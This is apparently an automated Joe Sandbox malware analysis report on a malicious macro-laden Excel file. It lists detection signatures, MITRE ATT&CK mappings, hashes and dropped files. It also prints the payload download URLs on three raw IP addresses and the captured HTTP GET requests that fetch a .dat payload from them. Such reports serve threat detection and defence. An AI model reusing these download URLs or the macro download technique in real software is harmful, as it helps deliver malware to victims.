Loading ...

Play interactive tourEdit tour

Analysis Report Copy-384955799-05102021.xlsm

Overview

General Information

Sample Name:Copy-384955799-05102021.xlsm
Analysis ID:412131
MD5:3a3aae5975bd4a5512cfea2a4a5991a6
SHA1:4ff9eafa51cdd8d979ef68dc8d0aa9ebb6168e20
SHA256:bba463e9f1b1044f7d3b09fe0d696ebb57b1668a1fc025363731c6aefac112bd
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malicious Excel 4.0 Macro
Multi AV Scanner detection for domain / URL
Yara detected Obfuscated Macro In XLSM
Document contains an embedded VBA macro which may execute processes
Document exploit detected (UrlDownloadToFile)
Found Excel 4.0 Macro with suspicious formulas
Found malicious URLs in unpacked macro 4.0 sheet
Allocates a big amount of memory (probably used for heap spraying)
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
IP address seen in connection with other malware
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2436 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
sheet2.xmlJoeSecurity_ObfuscatedMacroInXLSMYara detected Obfuscated Macro In XLSMJoe Security

    Sigma Overview

    No Sigma rule has matched

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for domain / URLShow sources
    Source: http://45.138.157.63/44313,6048108796.datVirustotal: Detection: 9%Perma Link
    Source: http://167.114.48.59/44313,6048108796.datVirustotal: Detection: 9%Perma Link
    Source: http://185.14.31.59/44313,6048108796.datVirustotal: Detection: 10%Perma Link
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

    Software Vulnerabilities:

    barindex
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
    Source: excel.exeMemory has grown: Private usage: 4MB later: 36MB
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.14.31.59:80
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.14.31.59:80

    Networking:

    barindex
    Found malicious URLs in unpacked macro 4.0 sheetShow sources
    Source: before.4.91.29.sheet.csv_unpackMacro 4.0 Deobfuscator: http://185.14.31.59/
    Source: Joe Sandbox ViewIP Address: 45.138.157.63 45.138.157.63
    Source: Joe Sandbox ViewIP Address: 185.14.31.59 185.14.31.59
    Source: Joe Sandbox ViewIP Address: 167.114.48.59 167.114.48.59
    Source: global trafficHTTP traffic detected: GET /44313,6048108796.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.14.31.59Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /44313,6048108796.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 45.138.157.63Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /44313,6048108796.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 167.114.48.59Connection: Keep-Alive
    Source: unknownTCP traffic detected without corresponding DNS query: 185.14.31.59
    Source: unknownTCP traffic detected without corresponding DNS query: 185.14.31.59
    Source: unknownTCP traffic detected without corresponding DNS query: 185.14.31.59
    Source: unknownTCP traffic detected without corresponding DNS query: 185.14.31.59
    Source: unknownTCP traffic detected without corresponding DNS query: 45.138.157.63
    Source: unknownTCP traffic detected without corresponding DNS query: 45.138.157.63
    Source: unknownTCP traffic detected without corresponding DNS query: 45.138.157.63
    Source: unknownTCP traffic detected without corresponding DNS query: 45.138.157.63
    Source: unknownTCP traffic detected without corresponding DNS query: 167.114.48.59
    Source: unknownTCP traffic detected without corresponding DNS query: 167.114.48.59
    Source: unknownTCP traffic detected without corresponding DNS query: 167.114.48.59
    Source: unknownTCP traffic detected without corresponding DNS query: 167.114.48.59
    Source: unknownTCP traffic detected without corresponding DNS query: 185.14.31.59
    Source: unknownTCP traffic detected without corresponding DNS query: 45.138.157.63
    Source: unknownTCP traffic detected without corresponding DNS query: 167.114.48.59
    Source: unknownTCP traffic detected without corresponding DNS query: 167.114.48.59
    Source: unknownTCP traffic detected without corresponding DNS query: 45.138.157.63
    Source: unknownTCP traffic detected without corresponding DNS query: 185.14.31.59
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6D75894A.jpgJump to behavior
    Source: global trafficHTTP traffic detected: GET /44313,6048108796.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.14.31.59Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /44313,6048108796.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 45.138.157.63Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /44313,6048108796.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 167.114.48.59Connection: Keep-Alive
    Source: before.4.91.29.sheet.csv_unpackString found in binary or memory: http://185.14.31.59/

    System Summary:

    barindex
    Found malicious Excel 4.0 MacroShow sources
    Source: Copy-384955799-05102021.xlsmInitial sample: urlmon
    Source: Copy-384955799-05102021.xlsmInitial sample: urlmon
    Document contains an embedded VBA macro which may execute processesShow sources
    Source: VBA code instrumentationOLE, VBA macro: Module dfgbfdg, Function Auto_Open, API Microsoft Excel:Application.Run(:Range)
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: Copy-384955799-05102021.xlsmInitial sample: EXEC
    Source: Copy-384955799-05102021.xlsmOLE, VBA macro line: Private Sub Auto_Open()
    Source: VBA code instrumentationOLE, VBA macro: Module dfgbfdg, Function Auto_Open
    Source: Copy-384955799-05102021.xlsmOLE indicator, VBA macros: true
    Source: classification engineClassification label: mal80.expl.evad.winXLSM@1/7@0/3
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Copy-384955799-05102021.xlsmJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD789.tmpJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: Copy-384955799-05102021.xlsmInitial sample: OLE zip file path = xl/media/image1.jpg
    Source: Copy-384955799-05102021.xlsmInitial sample: OLE zip file path = xl/drawings/drawing2.xml
    Source: Copy-384955799-05102021.xlsmInitial sample: OLE zip file path = xl/drawings/drawing3.xml
    Source: Copy-384955799-05102021.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
    Source: Copy-384955799-05102021.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet3.xml.rels
    Source: Copy-384955799-05102021.xlsmInitial sample: OLE zip file path = xl/drawings/_rels/drawing2.xml.rels
    Source: Copy-384955799-05102021.xlsmInitial sample: OLE zip file path = xl/drawings/_rels/drawing3.xml.rels
    Source: Copy-384955799-05102021.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

    Data Obfuscation:

    barindex
    Yara detected Obfuscated Macro In XLSMShow sources
    Source: Yara matchFile source: sheet2.xml, type: SAMPLE
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting32Path InterceptionExtra Window Memory Injection1Masquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Application Layer Protocol1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution12Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsScripting32LSASS MemorySystem Information Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Extra Window Memory Injection1Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    No Antivirus matches

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://45.138.157.63/44313,6048108796.dat9%VirustotalBrowse
    http://45.138.157.63/44313,6048108796.dat0%Avira URL Cloudsafe
    http://167.114.48.59/44313,6048108796.dat9%VirustotalBrowse
    http://167.114.48.59/44313,6048108796.dat0%Avira URL Cloudsafe
    http://185.14.31.59/44313,6048108796.dat10%VirustotalBrowse
    http://185.14.31.59/44313,6048108796.dat0%Avira URL Cloudsafe
    http://185.14.31.59/3%VirustotalBrowse
    http://185.14.31.59/0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    No contacted domains info

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://45.138.157.63/44313,6048108796.dattrue
    • 9%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    http://167.114.48.59/44313,6048108796.dattrue
    • 9%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    http://185.14.31.59/44313,6048108796.dattrue
    • 10%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://185.14.31.59/before.4.91.29.sheet.csv_unpacktrue
    • 3%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown

    Contacted IPs

    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs

    Public

    IPDomainCountryFlagASNASN NameMalicious
    45.138.157.63
    unknownRussian Federation
    44094WEBHOST1-ASRUfalse
    185.14.31.59
    unknownUkraine
    21100ITLDC-NLUAfalse
    167.114.48.59
    unknownCanada
    16276OVHFRfalse

    General Information

    Joe Sandbox Version:32.0.0 Black Diamond
    Analysis ID:412131
    Start date:12.05.2021
    Start time:12:31:08
    Joe Sandbox Product:CloudBasic
    Overall analysis duration:0h 4m 48s
    Hypervisor based Inspection enabled:false
    Report type:light
    Sample file name:Copy-384955799-05102021.xlsm
    Cookbook file name:defaultwindowsofficecookbook.jbs
    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
    Number of analysed new started processes analysed:4
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • EGA enabled
    • HDC enabled
    • GSI enabled (VBA)
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Detection:MAL
    Classification:mal80.expl.evad.winXLSM@1/7@0/3
    Cookbook Comments:
    • Adjust boot time
    • Enable AMSI
    • Found application associated with file extension: .xlsm
    • Found Word or Excel or PowerPoint or XPS Viewer
    • Attach to Office via COM
    • Scroll down
    • Close Viewer

    Simulations

    Behavior and APIs

    No simulations

    Joe Sandbox View / Context

    IPs

    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
    45.138.157.63Copy-1321435066-05102021.xlsmGet hashmaliciousBrowse
    • 45.138.157.63/44313,6048108796.dat
    Copy-1321435066-05102021.xlsmGet hashmaliciousBrowse
    • 45.138.157.63/44313,6048108796.dat
    Copy-1321435066-05102021.xlsmGet hashmaliciousBrowse
    • 45.138.157.63/44313,6048108796.dat
    Copy-812843793-05102021.xlsmGet hashmaliciousBrowse
    • 45.138.157.63/44313,6048108796.dat
    Copy-812843793-05102021.xlsmGet hashmaliciousBrowse
    • 45.138.157.63/44313,6048108796.dat
    Copy-812843793-05102021.xlsmGet hashmaliciousBrowse
    • 45.138.157.63/44313,6048108796.dat
    185.14.31.59Copy-1321435066-05102021.xlsmGet hashmaliciousBrowse
    • 185.14.31.59/44313,6048108796.dat
    Copy-1321435066-05102021.xlsmGet hashmaliciousBrowse
    • 185.14.31.59/44313,6048108796.dat
    Copy-1321435066-05102021.xlsmGet hashmaliciousBrowse
    • 185.14.31.59/44313,6048108796.dat
    Copy-812843793-05102021.xlsmGet hashmaliciousBrowse
    • 185.14.31.59/44313,6048108796.dat
    Copy-812843793-05102021.xlsmGet hashmaliciousBrowse
    • 185.14.31.59/44313,6048108796.dat
    Copy-812843793-05102021.xlsmGet hashmaliciousBrowse
    • 185.14.31.59/44313,6048108796.dat
    167.114.48.59Copy-1321435066-05102021.xlsmGet hashmaliciousBrowse
    • 167.114.48.59/44313,6048108796.dat
    Copy-1321435066-05102021.xlsmGet hashmaliciousBrowse
    • 167.114.48.59/44313,6048108796.dat
    Copy-1321435066-05102021.xlsmGet hashmaliciousBrowse
    • 167.114.48.59/44313,6048108796.dat
    Copy-812843793-05102021.xlsmGet hashmaliciousBrowse
    • 167.114.48.59/44313,6048108796.dat
    Copy-812843793-05102021.xlsmGet hashmaliciousBrowse
    • 167.114.48.59/44313,6048108796.dat
    Copy-812843793-05102021.xlsmGet hashmaliciousBrowse
    • 167.114.48.59/44313,6048108796.dat

    Domains

    No context

    ASN

    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
    WEBHOST1-ASRUf29046900fd4550e404656f9638540fc1d0ad90facbbe.exeGet hashmaliciousBrowse
    • 45.67.230.22
    3510495740-05102021.xlsmGet hashmaliciousBrowse
    • 45.67.230.159
    3510495740-05102021.xlsmGet hashmaliciousBrowse
    • 45.67.230.159
    3510495740-05102021.xlsmGet hashmaliciousBrowse
    • 45.67.230.159
    Copy-1321435066-05102021.xlsmGet hashmaliciousBrowse
    • 45.138.157.63
    Copy-1321435066-05102021.xlsmGet hashmaliciousBrowse
    • 45.138.157.63
    Copy-1321435066-05102021.xlsmGet hashmaliciousBrowse
    • 45.138.157.63
    520b670d_by_Libranalysis.xlsmGet hashmaliciousBrowse
    • 45.67.230.159
    520b670d_by_Libranalysis.xlsmGet hashmaliciousBrowse
    • 45.67.230.159
    520b670d_by_Libranalysis.xlsmGet hashmaliciousBrowse
    • 45.67.230.159
    Copy-812843793-05102021.xlsmGet hashmaliciousBrowse
    • 45.138.157.63
    Copy-812843793-05102021.xlsmGet hashmaliciousBrowse
    • 45.138.157.63
    Copy-812843793-05102021.xlsmGet hashmaliciousBrowse
    • 45.138.157.63
    15d3f15f_by_Libranalysis.xlsmGet hashmaliciousBrowse
    • 45.138.157.43
    15d3f15f_by_Libranalysis.xlsmGet hashmaliciousBrowse
    • 45.138.157.43
    15d3f15f_by_Libranalysis.xlsmGet hashmaliciousBrowse
    • 45.138.157.43
    7f8b3a9a_by_Libranalysis.xlsmGet hashmaliciousBrowse
    • 45.138.157.43
    7f8b3a9a_by_Libranalysis.xlsmGet hashmaliciousBrowse
    • 45.138.157.43
    7f8b3a9a_by_Libranalysis.xlsmGet hashmaliciousBrowse
    • 45.138.157.43
    4870aa6d_by_Libranalysis.xlsmGet hashmaliciousBrowse
    • 45.138.157.43
    OVHFRDHL_Shipment11052021pdf.exeGet hashmaliciousBrowse
    • 51.210.201.99
    A6FAm1ae1j.exeGet hashmaliciousBrowse
    • 217.182.77.10
    INV74321.exeGet hashmaliciousBrowse
    • 87.98.148.38
    aa04cdcc_by_Libranalysis.exeGet hashmaliciousBrowse
    • 46.105.217.100
    correct invoice.exeGet hashmaliciousBrowse
    • 213.186.33.5
    Kb0p7FYmN0yNdzP.exeGet hashmaliciousBrowse
    • 66.70.204.222
    551f47ac_by_Libranalysis.xlsmGet hashmaliciousBrowse
    • 193.70.33.51
    guluh4pYFQybxL8.exeGet hashmaliciousBrowse
    • 66.70.204.222
    qA9D8QVC4LrzlPR.exeGet hashmaliciousBrowse
    • 66.70.204.222
    OLy4KI85kB3HENF.exeGet hashmaliciousBrowse
    • 66.70.204.222
    generated purchase order 6149057.xlsmGet hashmaliciousBrowse
    • 158.69.48.225
    scan of document 5336227.xlsmGet hashmaliciousBrowse
    • 145.239.93.251
    67w7Ez6lvb.exeGet hashmaliciousBrowse
    • 91.121.251.178
    generated check 8460.xlsmGet hashmaliciousBrowse
    • 145.239.93.251
    export of bill 896621.xlsmGet hashmaliciousBrowse
    • 193.70.33.51
    copy of invoice 4347.xlsmGet hashmaliciousBrowse
    • 145.239.93.251
    scan of invoice 4366307.xlsmGet hashmaliciousBrowse
    • 51.222.42.168
    bill 04050.xlsmGet hashmaliciousBrowse
    • 193.70.33.51
    Purchase Order #330716.exeGet hashmaliciousBrowse
    • 51.91.236.193
    copy of payment 0535.xlsmGet hashmaliciousBrowse
    • 193.70.33.51
    ITLDC-NLUAmain_setup_x86x64.exeGet hashmaliciousBrowse
    • 185.154.14.180
    Copy-1321435066-05102021.xlsmGet hashmaliciousBrowse
    • 185.14.31.59
    Copy-1321435066-05102021.xlsmGet hashmaliciousBrowse
    • 185.14.31.59
    Copy-1321435066-05102021.xlsmGet hashmaliciousBrowse
    • 185.14.31.59
    Copy-812843793-05102021.xlsmGet hashmaliciousBrowse
    • 185.14.31.59
    Copy-812843793-05102021.xlsmGet hashmaliciousBrowse
    • 185.14.31.59
    Copy-812843793-05102021.xlsmGet hashmaliciousBrowse
    • 185.14.31.59
    0c69a7ab_by_Libranalysis.xlsmGet hashmaliciousBrowse
    • 195.123.220.175
    0c69a7ab_by_Libranalysis.xlsmGet hashmaliciousBrowse
    • 195.123.220.175
    0c69a7ab_by_Libranalysis.xlsmGet hashmaliciousBrowse
    • 195.123.220.175
    1456787477-05062021.xlsmGet hashmaliciousBrowse
    • 195.123.220.175
    1456787477-05062021.xlsmGet hashmaliciousBrowse
    • 195.123.220.175
    1456787477-05062021.xlsmGet hashmaliciousBrowse
    • 195.123.220.175
    11730679995-05062021.xlsmGet hashmaliciousBrowse
    • 195.123.220.175
    11730679995-05062021.xlsmGet hashmaliciousBrowse
    • 195.123.220.175
    11730679995-05062021.xlsmGet hashmaliciousBrowse
    • 195.123.220.175
    eda41d18_by_Libranalysis.xlsmGet hashmaliciousBrowse
    • 195.123.220.175
    eda41d18_by_Libranalysis.xlsmGet hashmaliciousBrowse
    • 195.123.220.175
    eda41d18_by_Libranalysis.xlsmGet hashmaliciousBrowse
    • 195.123.220.175
    11730940013-05062021.xlsmGet hashmaliciousBrowse
    • 195.123.220.175

    JA3 Fingerprints

    No context

    Dropped Files

    No context

    Created / dropped Files

    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6D75894A.jpg
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:[TIFF image data, big-endian, direntries=5], baseline, precision 8, 1080x1080, frames 3
    Category:dropped
    Size (bytes):92379
    Entropy (8bit):7.654577060340879
    Encrypted:false
    SSDEEP:1536:1o1vutINbjOXGw548LBkVb/oyrKXkX89DcO9GQSnIv+C1EDFVxkR7Y90:wvKINbjvw548LMb/oqKO8NnS8+60Kc0
    MD5:4A425E6A5A885C0D0E2589506FD2244B
    SHA1:E23482422480A4720E22F311B42BD65E2F3556F8
    SHA-256:76E685FC2035D8CF19945C6686D82054B64D0A9612853D8F428C4B4FE351C160
    SHA-512:3C827E13A12CC817CBD80EA7C89BEC5288FD21250728E76E00D6355008F704C77EC9BC37C85FF076D8D1F960DB53741F352AB649CD2C754B71B4D11CFFBEEA54
    Malicious:false
    Reputation:moderate, very likely benign file
    Preview: ......JFIF.....`.`.....ZExif..MM.*.................J............Q...........Q...........Q..........................C....................................................................C.......................................................................8.8.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..D.G.\.....i].......k.@U.........B..Hw.A...`p;.RsIRHTs..%G?QU.#..$..."...U.A....g].s......c..,....{W'..M.Nc....F.~..y..l..`.e..a..[...P.y]..k_..CI..z.Ru..s.6.Y....."..1]Q......e#.......~.`sk..KH......p.4.i.j+3{.....N.DS..L.....o..o.5f>..jY.uS...Z.B...UG`)..6D....(.....
    C:\Users\user\AppData\Local\Temp\E1EE0000
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:data
    Category:dropped
    Size (bytes):121515
    Entropy (8bit):7.700916809214941
    Encrypted:false
    SSDEEP:3072:ExFc/NvKINbjvw548LMb/oqKO8NnS8+60KcFfCr:whAbT648LM7D98Np+ECw
    MD5:304EFD5BF79F30BD08D0E2BC1B470DCD
    SHA1:B82D65B94F130AEA544FF1D43D1CEE03674ECA73
    SHA-256:7367876B15CEE1B9932F2A856801F8556E1C5109AD93FA2272178E12D3FA107A
    SHA-512:A56C6A37A91A0A8B3D4C264121FD43B9B2AC7D074482B82F5688B3C1C4D84B9F14926912B814F8DE12E243639FF5F915C4899910B843C902C934CD1B28CBB711
    Malicious:false
    Reputation:low
    Preview: .V]o.0.}.....u.M;i.&B...........%...w.(...)..|9..s?.....b.!*g+rA...+.T.....?.OR....Y..."..}.2|\z..F.X.&%...(.0<R..........y.f..v9..`...6.)c...7L..N........%...LU..V.'...V.n2Q...O..i.....@2....1<@J.X$l/g................~.!....p...;q..jN=...;....t....-4{va6vnF...j.X.B..m..".....p.+.....62..tq...)9...I..S..'....t.}...,l.;.}q..S..&....=.?`-LG^1-5.w.........C..~w..cw.?g.l}q~..@=yO......x..pO..}pS..v[.~9+...C6....>....?./...K.@.......#:v......K A..f./..........PK..........!.\..............[Content_Types].xml ...(.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................
    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Copy-384955799-05102021.LNK
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:17 2020, mtime=Wed May 12 18:31:43 2021, atime=Wed May 12 18:31:43 2021, length=121516, window=hide
    Category:dropped
    Size (bytes):2168
    Entropy (8bit):4.5326813202430145
    Encrypted:false
    SSDEEP:48:8ah/XTFGqFQH14sQh2ah/XTFGqFQH14sQ/:8K/XJGqFI4sQh2K/XJGqFI4sQ/
    MD5:0CC35C007D6BF90BB03B6BCAFBFD12EE
    SHA1:93F60BC140225CBB28E580462C7E257C2C3F0B0B
    SHA-256:6602D95F1C315C4F035C345F693FF330DCBDDCC0357D16790271E389496CF385
    SHA-512:3819943EF577630CF6E86501C0C81B34E208C6F1E34B730B5D58D12F9399807C74AEA53C4BB30C653C083E8A2A9C87FE7FBE4317E61C04C566115F52D5F597AC
    Malicious:false
    Reputation:low
